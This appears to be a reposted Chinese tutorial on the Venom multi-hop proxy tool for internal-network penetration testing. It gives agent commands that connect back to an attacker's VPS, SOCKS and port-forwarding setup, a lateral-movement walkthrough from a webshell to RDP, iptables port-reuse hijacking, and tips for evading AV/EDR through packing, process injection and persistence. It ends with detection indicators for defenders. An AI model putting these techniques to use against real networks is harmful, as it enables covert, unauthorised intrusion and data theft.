当前位置：首页 > news >正文

Venom多级代理工具：内网渗透测试的集中化与可视化利器

news 2026/6/20 6:55:46

1. 项目概述：Venom是什么，以及它为何是渗透测试的“瑞士军刀”

如果你是一名渗透测试工程师、红队成员，或者正在学习内网渗透技术，那么你一定对“跳板”和“代理”这两个词不陌生。在复杂的网络环境中，目标往往隐藏在层层防火墙和内网隔离之后，如何稳定、隐蔽地建立一条从攻击者到目标内网的通信通道，是决定渗透测试成败的关键。传统的工具链，比如使用SSH隧道、reGeorg、frp或者各种socks代理工具，往往需要手动串联，管理起来繁琐，拓扑结构不直观，一旦某个节点失联，排查起来更是头疼。今天要聊的Venom，就是为解决这些痛点而生的一个多级代理管理工具。

简单来说，Venom是一个用Go语言编写的、专为渗透测试设计的代理工具套件。它的核心价值在于，能够将你获取到的多个“肉鸡”（我们称之为Agent节点）像搭积木一样连接起来，形成一个可视化的、树状的多级代理网络。你只需要在一个统一的Admin控制台里操作，就能轻松管理所有节点，进行文件上传下载、获取交互式Shell、建立Socks5代理、进行端口转发等操作。它把复杂的网络穿透工作，变成了在命令行里敲几个简单指令的“可视化”工程。自从它在GitHub上开源以来，就因其设计的巧妙和功能的全面，在安全圈内获得了广泛的关注和应用。

2. Venom的核心设计思路与架构解析

2.1 为什么需要多级代理？

在真实的渗透测试或红队评估中，目标网络很少是“门户大开”的。通常，我们通过Web漏洞、社会工程学等方式，首先拿下一台位于DMZ区或办公网的边缘服务器（我们称之为第一跳板）。但这台机器可能无法直接访问核心的业务内网。此时，我们需要以这台机器为新的起点，进行横向移动，拿下第二台、第三台机器，逐步向纵深推进。每拿下一台机器，我们就获得了一个新的网络立足点。

Venom的设计哲学正是基于这个现实场景。它不像传统工具那样，每个代理链都需要独立的客户端和服务端配置。Venom采用了一个“Admin-Agent”的星型扩展模型。Admin是你的控制中心，而每一个被你控制的机器上运行着一个轻量级的Agent程序。Admin可以连接Agent，Agent也可以连接另一个Agent，从而形成任意层级的树状拓扑。这种设计带来了几个显著优势：

集中化管理：所有操作都在Admin端进行，无需登录到每一台肉鸡去启动或配置代理服务。
拓扑可视化：通过show命令，可以清晰地看到当前所有节点的连接关系，网络路径一目了然。
灵活扩展：新节点可以随时加入，只需在现有网络的任意一个节点上发起listen或connect即可，架构弹性极强。
稳定性增强：即使中间某个节点失联，也只会影响其下游分支，Admin和其他分支的节点依然可控，便于快速切换路径。

2.2 核心组件：Admin与Agent

理解Venom，首先要分清两个核心角色：

Admin节点：这是渗透测试人员自己掌控的主机。它运行admin程序，作为整个代理网络的大脑和指挥中心。所有命令从这里发出，所有节点的数据在这里汇总和展示。Admin节点通常运行在测试人员的攻击机（如Kali Linux）上。
Agent节点：这是被植入到目标网络内部各台主机上的程序。它运行agent程序，负责执行Admin发来的指令，并在其所在网络环境中充当流量转发器。Agent程序非常轻量，提供了多种平台和架构的编译版本，从x86/x64的Windows/Linux服务器，到ARM/MIPS的路由器、IoT设备都能覆盖。

它们之间的通信是双向的，既可以由Admin主动连接Agent，也可以让Agent反向连接Admin，这为应对不同的网络出口限制提供了灵活性。

2.3 节点间通信与加密

在对抗激烈的环境中，代理流量如果以明文传输，很容易被防守方的IDS/IPS识别和拦截。Venom在设计之初就考虑到了这一点，支持可选的节点间通信加密功能。

通过-passwd参数，可以为Admin和Agent指定一个相同的密码。这个密码会被用于生成AES加密算法的密钥，对Admin与Agent之间所有的控制指令和数据流量进行加密。这意味着，即使流量被捕获，在没有密码的情况下也无法解密出原始内容，大大增强了操作的隐蔽性。

注意：加密功能需要Admin和所有Agent在启动时使用相同的密码。如果密码不一致，节点将无法成功建立加密连接。建议在实战中务必使用此功能。

3. Venom的实战部署与核心功能详解

3.1 环境准备与程序获取

Venom是开源项目，你可以直接从其GitHub仓库的Release页面下载预编译好的二进制文件。根据你的操作系统（Admin端）和目标系统（Agent端）选择对应的版本，例如admin_linux_x64,agent_windows_x64.exe,agent_linux_arm等。

对于需要高度定制或研究源码的同学，也可以使用Go语言环境从源码编译。确保Go版本>=1.11，然后执行：

go get -u github.com/Dliv3/Venom/... cd $GOPATH/src/github.com/Dliv3/Venom ./build.sh

编译后的文件会存放在release目录下。

3.2 启动与连接：建立你的第一个代理链

让我们从一个最简单的场景开始：你有一台公网VPS（作为Admin），并且通过漏洞获取了一台目标内网Web服务器（Agent 1）的权限。

步骤1：在Admin节点（你的VPS）上启动监听。

./admin_linux_x64 -lport 9999 -passwd MySecretPassword123

这条命令让Admin在本地9999端口监听，并设置了连接密码。

步骤2：在Agent 1节点（Web服务器）上连接Admin。将对应的agent程序上传到目标服务器并执行：

./agent_linux_x64 -rhost [你的VPS公网IP] -rport 9999 -passwd MySecretPassword123

如果网络连通，你会看到Admin端提示有新节点连接成功。此时，一个最简单的单级代理就建立好了。

步骤3：使用show命令查看拓扑。在Admin的命令行界面（会显示(admin node) >>>提示符），输入：

show

你会看到类似A -> 1的拓扑，表示Admin（A）直接控制着节点1。

步骤4：进入节点进行操作。要操作节点1，需要使用goto命令切换到该节点上下文：

goto 1

提示符会变为(node 1) >>>，这意味着后续命令都将在节点1上执行。

3.3 核心功能命令实战解析

一旦建立了连接，Venom的强大功能就通过一系列内置命令展现出来。以下是在(node 1) >>>提示符下可用的关键命令：

3.3.1 文件操作：upload/download内网渗透中，上传工具和下载数据是高频操作。Venom集成了稳定的文件传输功能。

上传：将本地的nmap扫描器上传到节点1的/tmp目录。
```
upload /usr/bin/nmap /tmp/nmap
```
传输过程有进度条显示，对于大文件（>100M）会有确认提示。
下载：从节点1下载发现的敏感文件/etc/passwd到本地。
```
download /etc/passwd ./passwd_from_target.txt
```
实操心得：Venom的文件传输是稳定可靠的，但在网络延迟高或不稳定时，传输大文件可能会中断。对于超大型文件（如数GB的数据库备份），建议先在目标机上用split命令分割，再分批下载。

3.3.2 获取交互式Shell：shell这是最直接的控制方式。执行shell命令，你会直接获得一个目标节点的交互式Shell，可以执行whoami,ifconfig,netstat等命令探查信息。

shell bash-4.2$ id uid=1001(www-data) gid=1001(www-data) groups=1001(www-data) bash-4.2$ exit

注意事项：这个Shell是非交互式的（non-interactive），意味着不支持sudo需要TTY的交互、不支持top等需要终端控制的程序。对于需要完整TTY的场景，可以通过这个Shell再手动用python -c 'import pty; pty.spawn("/bin/bash")'等方式升级。

3.3.3 建立Socks5代理：socks这是Venom的“王牌”功能之一。假设节点1可以访问另一个更深的网段192.168.2.0/24，而我们想直接从本地访问这个网段。

socks 1080

执行后，Admin节点本地会开启一个监听在1080端口的Socks5代理服务。接下来，你只需要将你的浏览器、扫描器（如Nmap的--proxies选项）或任何支持Socks5代理的工具配置为127.0.0.1:1080，所有流量就会通过节点1转发出去，仿佛你的机器直接接入了节点1所在的网络。

3.3.4 端口转发：lforward / rforward端口转发用于暴露或访问特定服务，比全流量代理的Socks5更加精准。

本地端口转发 (lforward)：将Admin本地一个端口映射到目标节点的某个端口。例如，节点1上有一个内网的Web服务（192.168.1.100:80）无法直接访问。我们可以将其映射到本地的8080端口。
```
lforward 127.0.0.1 8080 192.168.1.100 80
```
之后，在本地浏览器访问http://127.0.0.1:8080，就等于访问了内网的192.168.1.100:80。
远程端口转发 (rforward)：将目标节点网络中的一个端口，映射到Admin本地的一个端口。例如，你想让内网中的另一台机器（192.168.1.200）能访问你本地的Metasploit监听器（4444端口）。可以在节点1上执行：
```
rforward 192.168.1.200 4444 127.0.0.1 4444
```
这样，当内网的192.168.1.200机器连接节点1的4444端口时，流量就会被转发到你本地的4444端口。

3.3.5 扩展代理网络：listen / connect这是构建多级代理的关键。现在，假设通过节点1，你又拿下了内网中另一台主机（称为节点2）。

在节点1上开启一个监听端口：
```
listen 5555
```
在节点2（新控制的主机）上，运行agent程序，让其连接到节点1的5555端口：
```
./agent_linux_x64 -rhost [节点1的IP] -rport 5555 -passwd MySecretPassword123
```
回到Admin，执行show，你会看到拓扑变为A -> 1 -> 2。现在，你可以goto 2，然后在节点2上执行socks 1081，这样就建立了一个通过节点1跳转到节点2的第二级Socks5代理。你的扫描器如果配置为127.0.0.1:1081，流量路径就是：你 -> Admin -> 节点1 -> 节点2 -> 目标。

4. 高级特性与隐蔽技巧：端口复用

端口复用是Venom另一个极具实战价值的功能。它的目的是让Agent程序监听在目标主机上一个已被占用的端口（如Web服务的80端口），同时不影响原有服务的正常运行。这能有效绕过防火墙对“新开异常端口”的监控，实现高度隐蔽。

Venom提供了两种端口复用模式，适用于不同场景。

4.1 模式一：SO_REUSEADDR/SO_REUSEPORT（通用模式）

这是利用操作系统的Socket选项实现的。在启动Agent时，通过-lhost和-reuse-port参数指定要复用的IP和端口。

./agent_linux_x64 -lhost 192.168.1.10 -reuse-port 80 -passwd xxx

-lhost必须指定为本机的一个具体IP地址，不能是0.0.0.0。
-reuse-port后跟要复用的端口号，如80。

然后，Admin像往常一样连接这个IP和端口即可。此时，发往该主机80端口的流量，会先被Venom的Agent处理。如果Agent判断不是自己的协议数据包，则会将其转发给原本监听80端口的服务（如Apache）。这实现了“寄生”式的复用。

注意事项：这种模式并非在所有系统和所有服务上都有效。例如，在Windows上可以较好复用Apache、MySQL的端口，但难以复用RDP、IIS等服务的端口。在Linux上兼容性相对较好。

4.2 模式二：基于iptables的转发（Linux专属）

这种方法更底层，利用Linux的iptables防火墙规则进行流量转发，理论上可以复用任何TCP端口。它需要root权限运行Agent。

sudo ./agent_linux_x64 -lport 8080 -reuse-port 80

这条命令的含义是：Agent实际监听在8080端口，但通过iptables规则，将到达80端口的流量转发到8080端口。Admin连接时，依然连接目标的80端口。

这种模式的精髓在于其“开关”机制。为了避免Agent进程意外退出（如被kill -9）导致iptables规则残留，进而使原80端口服务不可用，Venom配套了一个Python脚本scripts/port_reuse.py来控制规则的启用和关闭。

使用流程：

在目标Linux主机上以root权限启动Agent，监听一个空闲端口（如8080），并声明要复用80端口。
在你的攻击机上，运行port_reuse.py脚本，发送一个特殊的TCP包去“激活”目标机上的iptables转发规则。
```
python port_reuse.py --start --rhost 192.168.1.10 --rport 80
```
此时，Admin才能成功连接到192.168.1.10:80。
操作结束后，运行以下命令关闭转发规则，恢复80端口正常服务：
```
python port_reuse.py --stop --rhost 192.168.1.10 --rport 80
```

核心技巧：第二种模式隐蔽性极高，因为Agent进程本身并不直接绑定在敏感端口上。防守方检查netstat -antp看到80端口仍然是Apache在监听，但实际上流量已经被“劫持”转发。这是绕过端口监控的利器。

5. 典型实战场景与操作流程

让我们构建一个稍复杂的模拟场景，串联使用上述功能。

场景：你通过一个Web漏洞获得了公网一台应用服务器（跳板机A，Ubuntu）的Webshell。该服务器处于DMZ区，内网网卡IP为172.16.1.20。通过它，你发现内网存在一个172.16.2.0/24的网段，其中有一台数据库服务器（目标机B，Windows）存有核心数据。

目标：在你的本地Kali（Admin）上，直接对172.16.2.0/24网段进行扫描，并访问数据库服务器的远程桌面（RDP）服务。

操作步骤：

上传并启动Agent A：通过Webshell，将agent_linux_x64上传到跳板机A，并运行，让其反向连接你的公网VPS（Admin）。
```
# 在跳板机A上执行 chmod +x agent_linux_x64 ./agent_linux_x64 -rhost [你的VPSIP] -rport 9999 -passwd [密码]
```

Admin连接与管理：你的VPS上Admin显示节点1上线。goto 1后，先用shell命令简单探查。

shell ifconfig # 发现内网网卡 eth1: 172.16.1.20 ping 172.16.2.1 # 可以通，确认网络可达 exit

建立一级Socks代理：在节点1上建立Socks5代理，以便本地工具能访问172.16.1.0/24网段。
```
socks 10800
```
横向移动至目标机B：利用节点1的代理，使用你的渗透框架（如Metasploit，设置代理为127.0.0.1:10800）对172.16.2.0/24进行扫描和攻击，最终在目标机B（Windows，IP: 172.16.2.100）上获得权限。
上传并启动Agent B：通过已建立的通道，将agent_windows_x64.exe上传到目标机B并执行。此时，需要让Agent B连接到Agent A。在Admin端，先在节点1上开启一个监听端口。
```
# 在Admin端，确保在节点1的上下文中 listen 5555
```
然后，在目标机B上运行：
```
agent_windows_x64.exe -rhost 172.16.1.20 -rport 5555 -passwd [密码]
```
构建二级代理网络：回到Admin，执行show，看到拓扑A->1->2。goto 2切换到目标机B节点。
实现最终目标：
- 扫描内网：在节点2上再开一个Socks5代理(node 2) >>> socks 10801。现在，你的扫描器配置为127.0.0.1:10801，流量路径就是：Kali -> VPS(Admin) -> 跳板机A -> 目标机B -> 更深的内部网络。
- 访问RDP：目标机B的RDP服务（3389）在内网。我们可以使用lforward将其映射到本地。
```
lforward 127.0.0.1 13389 172.16.2.100 3389
```
  现在，在你的本地Kali上，用rdesktop连接127.0.0.1:13389，就可以访问到内网数据库服务器的远程桌面了。

通过这个流程，Venom将复杂的多级内网穿透，简化成了清晰的几个步骤，并且整个代理链的拓扑清晰可见，管理起来非常方便。

6. 常见问题、排查技巧与防御思考

6.1 常见问题与解决方案

在实际使用中，你可能会遇到以下问题：

问题现象	可能原因	排查与解决思路
Agent启动后，Admin无法连接	1. 网络不通（防火墙、路由） 2. 密码不一致 3. 端口被占用或未监听	1. 在Agent主机上用`telnet`或`nc`测试到Admin端口的连通性。 2. 检查`-passwd`参数是否完全一致（区分大小写）。 3. 在Admin端用`netstat -ant \| grep [PORT]`检查端口是否在监听。
`show`命令看不到新连接的节点	拓扑未同步	在Admin节点执行`show`命令后，新节点的信息才会同步到管理界面。这是正常流程，记得每次新增节点后`show`一下。
Socks5代理或端口转发建立失败	1. 目标端口已被占用 2. 权限不足（如Linux上绑定1024以下端口） 3. 节点上下文错误	1. 换一个本地空闲端口。 2. 对于Linux，尝试用root权限运行Admin，或使用大于1024的端口。 3. 确认你是在正确的节点（`goto [id]`）下执行命令。
文件传输中断或速度极慢	网络不稳定或延迟高	1. 尝试分块传输小文件。 2. 在网络条件好的时段操作。 3. 考虑先在目标机压缩文件再传输。
端口复用（模式二）失效	1. 未使用`port_reuse.py`脚本激活 2. iptables规则被清除 3. 目标系统无iptables（如Windows）	1. 确认已执行`python port_reuse.py --start ...`。 2. 检查目标机iptables规则是否存在。 3. 模式二仅适用于Linux，Windows请使用模式一。

6.2 提升隐蔽性与稳定性技巧

加密是必须的：永远使用-passwd参数。明文传输的代理流量是安全设备的重点检测对象。
善用端口复用：在需要高度隐蔽的长期驻留场景，优先考虑端口复用，避免新增开放端口。
Agent程序免杀与隐藏：上传的agent二进制文件可能被AV/EDR查杀。需要事先进行混淆、加壳或源码级修改。运行后，可考虑重命名进程、注入到合法进程等方式隐藏。
设置守护进程：在Linux上，可以用nohup或systemd服务将agent设为后台守护进程；在Windows上，可注册为服务。
网络超时与重连：Venom自身在网络中断后的重连机制可能不够健壮。可以编写外部监控脚本，定期检查agent进程和连接，异常时自动重启。
流量伪装（进阶）：Venom本身不提供流量伪装。在严格监控的网络中，可以考虑在Admin与第一个Agent之间套一层加密隧道（如SSH隧道），或者使用基于HTTPS等合法协议的工具（如reGeorg）作为第一跳，再用Venom管理内网。

6.3 从防御视角看Venom

了解攻击工具，才能更好地防御。作为防守方（蓝队），可以通过以下迹象发现Venom的活动：

异常进程与网络连接：检查服务器上是否存在未知的、名称可疑的进程（如agent_linux_x64）。查看异常的外连或监听连接，特别是与已知恶意IP的通信。
端口复用检测：对于Linux，检查iptables中是否存在非常规的转发规则（iptables -L -n -t nat）。对于任何服务端口，监控其上的协议是否突然“多了一种”。可以通过发送非Venom协议的数据包并分析响应来探测。
流量特征分析：虽然Venom支持加密，但其握手协议和心跳包可能存在固定模式。在网络边界部署IDS/IPS，可以通过深度包检测（DPI）分析TLS/SSL以外的加密流量特征，建立威胁模型。
主机行为监控：Agent会进行文件操作、创建Shell进程、建立新监听端口等。EDR产品可以通过行为序列检测这些异常活动。

Venom是一款设计精良的渗透测试工具，它将多级代理的复杂管理变得简单直观。无论是用于授权的渗透测试、红队演练，还是作为学习内网渗透技术的实验平台，它都具有极高的价值。当然，任何技术都是双刃剑，在使用它时，务必确保你的行为在法律和授权许可的范围内。工具本身无罪，关键在于使用它的人。

查看全文

http://www.jsqmd.com/news/1046927/